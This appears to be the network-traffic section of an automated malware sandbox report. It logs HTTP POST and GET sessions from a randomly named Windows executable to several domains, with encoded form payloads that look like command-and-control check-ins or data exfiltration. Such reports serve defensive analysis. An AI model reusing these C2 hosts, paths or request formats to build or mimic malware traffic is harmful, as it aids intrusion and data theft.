                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            26192.168.11.2049745173.255.194.134802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:34.188080072 CET761OUTPOST /wie9/ HTTP/1.1
                                                                                                                            Host: www.jigg.space
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.jigg.space
                                                                                                                            Referer: http://www.jigg.space/wie9/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 4f 74 58 59 55 41 72 4d 34 77 30 78 64 65 39 73 56 52 2f 71 6d 4f 6c 6a 7a 47 64 7a 69 79 49 31 57 61 31 63 4d 7a 2b 67 52 48 4a 6c 4f 74 56 68 75 38 41 76 50 43 31 4f 49 63 4e 42 6d 47 67 71 7a 66 59 4d 33 4c 74 30 39 50 54 6a 4e 74 61 4b 75 58 4b 7a 59 51 49 6e 6a 43 35 36 66 57 45 63 66 53 57 50 7a 4a 50 41 74 51 65 66 56 58 41 78 50 31 30 2f 43 4e 46 7a 64 7a 7a 59 49 58 58 6f 4a 6b 66 77 6e 4a 63 7a 6e 47 76 30 61 45 46 39 71 68 65 38 52 50 42 4f 56 38 6b 36 69 36 6e 38 7a 55 78 34 35 36 6e 7a 50 67 49 76 56 54 4a 55 38 51 7a 36 4b 55 58 4c 5a 6e 6a 58 33 55 77 5a 32 49 54 79 7a 50 53 6d 6b 30 3d
                                                                                                                            Data Ascii: mRu=oJTv8AFgQV3EbOtXYUArM4w0xde9sVR/qmOljzGdziyI1Wa1cMz+gRHJlOtVhu8AvPC1OIcNBmGgqzfYM3Lt09PTjNtaKuXKzYQInjC56fWEcfSWPzJPAtQefVXAxP10/CNFzdzzYIXXoJkfwnJcznGv0aEF9qhe8RPBOV8k6i6n8zUx456nzPgIvVTJU8Qz6KUXLZnjX3UwZ2ITyzPSmk0=
                                                                                                                            Nov 12, 2024 15:31:34.322832108 CET299INHTTP/1.1 200 OK
                                                                                                                            server: openresty/1.13.6.1
                                                                                                                            date: Tue, 12 Nov 2024 14:31:34 GMT
                                                                                                                            content-type: application/octet-stream
                                                                                                                            content-length: 110
                                                                                                                            content-type: text/html
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 68 31 3e 3c 70 3e 43 6f 6d 69 6e 67 20 73 6f 6f 6e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <html><head><title>www.jigg.space</title></head><body><h1>www.jigg.space</h1><p>Coming soon.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            27192.168.11.2049746173.255.194.134802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:36.856694937 CET1289OUTPOST /wie9/ HTTP/1.1
                                                                                                                            Host: www.jigg.space
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.jigg.space
                                                                                                                            Referer: http://www.jigg.space/wie9/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 6f 4a 54 76 38 41 46 67 51 56 33 45 62 4f 74 58 59 55 41 72 4d 34 77 30 78 64 65 39 73 56 52 2f 71 6d 4f 6c 6a 7a 47 64 7a 69 36 49 31 41 4f 31 64 76 62 2b 68 52 48 4a 6d 4f 74 55 68 75 38 6e 76 4c 75 78 4f 49 51 37 42 6a 43 67 72 53 2f 59 63 46 6a 74 39 39 50 54 38 39 74 5a 4f 75 58 66 7a 59 41 45 6e 6a 53 35 36 66 57 45 63 63 4b 57 47 43 4a 50 43 74 51 5a 57 31 58 63 67 66 31 49 2f 43 46 56 7a 64 33 38 59 34 33 58 6f 6f 55 66 6a 69 56 63 77 48 47 74 31 61 45 64 39 71 64 46 38 52 37 33 4f 56 59 4b 36 6c 47 6e 2b 79 73 72 71 34 43 49 70 74 6f 34 6c 55 6e 44 44 71 51 4e 6c 36 34 50 4b 36 4c 44 57 42 49 6a 66 6b 59 6d 6e 78 36 56 6b 51 77 69 42 6e 35 70 59 72 76 39 6b 4c 52 77 52 74 50 44 54 73 68 54 4d 2b 30 5a 53 76 51 6c 52 2b 2b 39 4f 45 49 4a 35 6e 6a 59 55 2f 41 59 6c 73 47 48 71 64 52 44 53 37 46 4c 75 59 54 65 66 78 6e 47 4c 46 43 46 74 41 63 47 71 4d 72 42 32 39 4c 69 39 77 6f 66 62 67 66 41 68 56 31 56 5a 71 43 56 74 50 58 78 53 4d 66 72 66 6e 54 55 69 77 57 2f 4b 53 59 38 73 53 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=oJTv8AFgQV3EbOtXYUArM4w0xde9sVR/qmOljzGdzi6I1AO1dvb+hRHJmOtUhu8nvLuxOIQ7BjCgrS/YcFjt99PT89tZOuXfzYAEnjS56fWEccKWGCJPCtQZW1Xcgf1I/CFVzd38Y43XooUfjiVcwHGt1aEd9qdF8R73OVYK6lGn+ysrq4CIpto4lUnDDqQNl64PK6LDWBIjfkYmnx6VkQwiBn5pYrv9kLRwRtPDTshTM+0ZSvQlR++9OEIJ5njYU/AYlsGHqdRDS7FLuYTefxnGLFCFtAcGqMrB29Li9wofbgfAhV1VZqCVtPXxSMfrfnTUiwW/KSY8sS+bavf1nRI6nnwmCZ8O21H98NH7aWSUIgttjdgpC74RtdWCUp4SX3PFRfuPMU0UiVKYMqRWsYGcE5h3NKudijqnEAeHarxFvBUyg/tTGtM3EiQSGbcs/vglAXC/KVh1Z7rNYe7iSfE4tzuMJukzTU2vB5gfwKTeF8ziV7WlgQsT1EA1iTi36jhXgH+xW57zht8CB4oLZ1YNkEQB96oM1AuOuaenFrgp8ZBODnyTzvr/mcm6p+R2yJLmDA9agzw/5vZQ3ywpgeH7SCVO9MtK1oZ6toYjGhqdf2dpman3ky8eNsUmf+18EfR2v9DHfMOkJ/dYCbhxK+/MteWLvyqfqEnZWj1mzTR8fW/ihqIr6qTveVQ4dIJs/OazHCkzgmPZ2qZcfwBAQijyllvfOeerPg/xph+
                                                                                                                            Nov 12, 2024 15:31:36.856755018 CET6621OUTData Raw: 4b 46 43 6b 32 59 45 47 37 30 35 65 42 62 32 6b 38 68 6f 48 6e 51 4c 50 35 6c 72 70 44 77 54 77 4a 50 31 33 56 66 67 58 55 76 37 6f 4a 67 41 50 67 76 75 38 39 46 70 77 6b 65 43 36 35 75 49 2f 4f 49 72 55 49 61 42 54 4c 72 4a 71 31 32 75 43 2f 72
                                                                                                                            Data Ascii: KFCk2YEG705eBb2k8hoHnQLP5lrpDwTwJP13VfgXUv7oJgAPgvu89FpwkeC65uI/OIrUIaBTLrJq12uC/rzzuebVSL01k/7wIqwYS4Xxil7zfPuJAatd2DoQue0S9qFtp4qc/ItkY+m2gRHnMSDz9cXGfTgRoE3Jg64iDuD7xkc5ausWENONx9t3e3IOFzETsG+lbqultLZ9WyraLbwSg4AEubIF9C+9b8t9Pi3dYXBbzSu+gRg
                                                                                                                            Nov 12, 2024 15:31:36.991569042 CET759INHTTP/1.1 403 Forbidden
                                                                                                                            server: openresty/1.13.6.1
                                                                                                                            date: Tue, 12 Nov 2024 14:31:36 GMT
                                                                                                                            content-type: text/html
                                                                                                                            content-length: 577
                                                                                                                            x-fail-reason: Bad Actor
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 [TRUNCATED]
                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            28192.168.11.2049747173.255.194.134802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:39.525569916 CET473OUTGET /wie9/?mRu=lL7P/0JUYVbqWckkUFA5AZs0yLHF2CZptxiRtFaWww2Jt1+4Ybj8qDPeqsoco5xM//SPE5hjfF332jPzZ07z97WSr/ctCPXD3Kda+wiI2ZiEZuGqb25QMsE=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.jigg.space
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:31:39.659780025 CET299INHTTP/1.1 200 OK
                                                                                                                            server: openresty/1.13.6.1
                                                                                                                            date: Tue, 12 Nov 2024 14:31:39 GMT
                                                                                                                            content-type: application/octet-stream
                                                                                                                            content-length: 110
                                                                                                                            content-type: text/html
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 68 31 3e 3c 70 3e 43 6f 6d 69 6e 67 20 73 6f 6f 6e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <html><head><title>www.jigg.space</title></head><body><h1>www.jigg.space</h1><p>Coming soon.</p></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            29192.168.11.20497483.33.130.190802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:44.980554104 CET768OUTPOST /cbd3/ HTTP/1.1
                                                                                                                            Host: www.econsultoria.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.econsultoria.online
                                                                                                                            Referer: http://www.econsultoria.online/cbd3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6c 59 36 6e 67 39 59 30 69 4f 68 49 73 6c 73 72 66 4b 66 49 33 78 42 37 2f 63 48 4e 62 57 79 70 58 50 33 75 5a 30 61 46 71 44 4a 76 74 35 61 37 34 30 54 34 53 46 46 2b 44 33 78 42 57 33 41 44 7a 64 43 72 48 32 46 62 64 6b 69 43 63 33 4a 6e 77 43 70 38 6d 5a 6d 4f 6d 42 39 79 67 30 4e 4a 6a 2f 76 5a 53 46 50 30 54 4d 71 4e 4e 76 66 46 31 65 56 56 36 49 6a 52 6d 65 67 2b 6a 59 6d 64 4a 4a 66 4c 72 6e 59 6b 71 6a 72 34 72 6c 62 33 62 4b 30 53 74 36 78 54 4e 41 61 4d 4f 39 69 46 67 6f 43 4c 4d 47 72 2b 76 4b 7a 62 41 30 6d 39 33 74 75 59 4c 51 3d 3d
                                                                                                                            Data Ascii: mRu=KUXFddijcs6QlY6ng9Y0iOhIslsrfKfI3xB7/cHNbWypXP3uZ0aFqDJvt5a740T4SFF+D3xBW3ADzdCrH2FbdkiCc3JnwCp8mZmOmB9yg0NJj/vZSFP0TMqNNvfF1eVV6IjRmeg+jYmdJJfLrnYkqjr4rlb3bK0St6xTNAaMO9iFgoCLMGr+vKzbA0m93tuYLQ==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            30192.168.11.20497493.33.130.190802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:47.635078907 CET788OUTPOST /cbd3/ HTTP/1.1
                                                                                                                            Host: www.econsultoria.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.econsultoria.online
                                                                                                                            Referer: http://www.econsultoria.online/cbd3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6b 35 4b 6e 69 63 59 30 67 75 68 4c 31 56 73 72 4b 61 65 50 33 78 64 37 2f 64 7a 64 63 6a 61 70 58 75 48 75 61 78 75 46 76 44 4a 76 31 70 61 2b 6c 45 54 7a 53 46 5a 4d 44 31 31 42 57 33 38 44 7a 59 2b 72 48 6e 46 59 66 30 69 41 51 58 4a 66 2b 69 70 38 6d 5a 6d 4f 6d 42 70 63 67 30 56 4a 6a 50 2f 5a 51 6b 50 33 51 4d 71 4f 64 2f 66 46 78 65 56 52 36 49 6a 7a 6d 62 4a 70 6a 61 65 64 4a 4d 6a 4c 72 32 59 6e 2f 54 72 2b 6c 46 61 79 59 59 39 31 71 70 6c 73 63 78 75 2f 49 75 53 76 68 2b 50 52 52 30 66 61 73 5a 76 70 45 45 66 56 31 76 76 44 57 5a 41 6c 55 5a 49 52 67 36 79 39 4d 77 67 6b 46 63 45 56 73 44 34 3d
                                                                                                                            Data Ascii: mRu=KUXFddijcs6Qk5KnicY0guhL1VsrKaeP3xd7/dzdcjapXuHuaxuFvDJv1pa+lETzSFZMD11BW38DzY+rHnFYf0iAQXJf+ip8mZmOmBpcg0VJjP/ZQkP3QMqOd/fFxeVR6IjzmbJpjaedJMjLr2Yn/Tr+lFayYY91qplscxu/IuSvh+PRR0fasZvpEEfV1vvDWZAlUZIRg6y9MwgkFcEVsD4=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            31192.168.11.20497503.33.130.190802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:50.291676044 CET2578OUTPOST /cbd3/ HTTP/1.1
                                                                                                                            Host: www.econsultoria.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.econsultoria.online
                                                                                                                            Referer: http://www.econsultoria.online/cbd3/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6b 35 4b 6e 69 63 59 30 67 75 68 4c 31 56 73 72 4b 61 65 50 33 78 64 37 2f 64 7a 64 63 6a 43 70 51 63 50 75 61 57 79 46 6f 44 4a 76 72 35 61 2f 6c 45 54 75 53 46 52 49 44 31 70 37 57 78 34 44 68 4b 6d 72 51 44 5a 59 46 6b 69 41 59 33 4a 6b 77 43 6f 6b 6d 64 43 30 6d 42 35 63 67 30 56 4a 6a 4e 33 5a 55 31 50 33 57 4d 71 4e 4e 76 66 4a 31 65 56 35 36 4d 50 4a 6d 62 46 35 6a 70 57 64 4a 73 54 4c 73 45 77 6e 6a 44 72 38 6f 6c 61 55 59 59 68 71 71 70 70 47 63 79 7a 53 49 73 79 76 6a 5a 7a 4c 46 45 54 33 2f 50 79 6b 46 48 6e 6a 32 75 33 42 54 4b 51 33 45 66 6f 67 6d 38 71 6c 50 32 67 38 43 73 51 42 36 6b 42 52 31 55 36 57 36 63 6b 58 6e 36 72 43 35 4d 56 7a 47 6e 71 65 41 50 64 63 72 77 6a 4a 4f 36 79 2b 37 41 6d 58 36 65 30 51 30 32 2f 42 6d 36 79 53 37 2f 49 61 79 39 39 63 53 71 75 69 47 4c 66 53 71 72 53 4f 30 79 32 79 2b 68 5a 31 61 47 5a 31 72 56 36 6b 42 54 54 2f 46 67 54 2f 70 64 37 39 34 4a 65 6d 75 53 62 56 4a 49 4c 5a 4c 48 4a 76 56 38 33 71 42 67 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=KUXFddijcs6Qk5KnicY0guhL1VsrKaeP3xd7/dzdcjCpQcPuaWyFoDJvr5a/lETuSFRID1p7Wx4DhKmrQDZYFkiAY3JkwCokmdC0mB5cg0VJjN3ZU1P3WMqNNvfJ1eV56MPJmbF5jpWdJsTLsEwnjDr8olaUYYhqqppGcyzSIsyvjZzLFET3/PykFHnj2u3BTKQ3Efogm8qlP2g8CsQB6kBR1U6W6ckXn6rC5MVzGnqeAPdcrwjJO6y+7AmX6e0Q02/Bm6yS7/Iay99cSquiGLfSqrSO0y2y+hZ1aGZ1rV6kBTT/FgT/pd794JemuSbVJILZLHJvV83qBg9Ky6l1l7Wr56rYT25XIYqIKL6RTXYBBH457UlWCWiVOBl5schx4hY+lb8nowKkxzp4P0J1FGSg9clD37Z+izkitT5wUWfO57ieaMaaJhwz83qK44JwMycIfNBit5WckEeaZPu1c8WKJOG7YajjrtwHfN/KxsIs7tvNCQVUSgt7nTRK+J5AeP2qetTdDnyKCtDUGVf/nCwnYpN/PiK/+RIo8rTji49yVBSwO3sJFZrKMETgVzlriys3k1iqd72frc4M3yrjelxtOVGhsT94PgNkBfcRyaQwuOFCuRGnXv/ph19X3bOUGG8hiQrW8o45EhmXJKtOZuO4S/kW9OnbugCIF9zn3xrQPOO2GzIpIjyAcoUwQjcN4/fR7LJaeLon6rWh+Q/511XAt6vqfHAruewkJd86Ez4we8MKiMJfE9bpnObRim3hS/DPpBzre1cv+6qXrgxJEPRE7XaFuYRtxW5u7ZwAcvl4eilqc6z+QFMFnvfVnPuU/Bri3h3ecj2BKJGmYf3ALTm0YCTVPHzK4mt/kVgDjIjr408iHI502zniU4gwJYNfgndfvmJqAxGMhF+DraB6XFP13u1o4G5e2RYho9b5WdBMwfi4CLlZwmNwI3IGtN7SEAnrJoK711B7wxwq/tFi3uNG7/ztF2llbPROkwtelgB2epRo [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:31:50.291800976 CET5359OUTData Raw: 71 30 4a 48 30 74 69 52 6d 36 4b 33 35 35 41 73 39 63 48 49 67 36 59 58 4f 62 53 76 6d 4d 6c 31 37 79 53 37 4e 59 45 57 59 43 30 6b 5a 68 75 48 77 68 59 52 2f 77 46 63 4e 42 4a 33 50 76 47 63 77 69 44 2b 72 32 4d 4d 6a 68 71 53 53 42 55 32 2f 64
                                                                                                                            Data Ascii: q0JH0tiRm6K355As9cHIg6YXObSvmMl17yS7NYEWYC0kZhuHwhYR/wFcNBJ3PvGcwiD+r2MMjhqSSBU2/dHfFogXnBzh4son/31eJEZ7qR1n8RKfiOsvPM1B9RS1IJ54q+Hr/ARyB9bND0QG/HDGs1oW8gYtTnzLbVG5LScsK3etobclDNiIN3pCtzL7KU5cbaBh0hp+BlnAqq37E+FRneJ5zvp6NY/XKXUqv0Ig+HDVZlb7+6b


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            32192.168.11.20497513.33.130.190802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:52.944065094 CET482OUTGET /cbd3/?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.econsultoria.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:31:53.081094980 CET388INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Tue, 12 Nov 2024 14:31:53 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 248
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 48 57 2f 6c 65 72 4f 79 56 71 43 58 75 37 6e 30 74 2f 45 55 6c 59 4a 30 32 79 31 79 4e 64 48 7a 6f 47 73 74 78 76 7a 6e 63 51 62 59 66 73 62 51 65 52 32 64 74 78 78 4d 76 4d 50 72 6d 31 65 53 63 68 42 4c 42 6b 41 6c 66 68 38 65 79 34 47 73 55 48 63 57 5a 43 6a 64 56 51 31 45 30 69 73 38 74 66 69 77 2b 79 4a 48 69 43 41 68 68 75 58 30 4b 79 54 48 58 65 45 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            33192.168.11.204975284.32.84.32802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:31:58.556596041 CET759OUTPOST /zis1/ HTTP/1.1
                                                                                                                            Host: www.webworld.digital
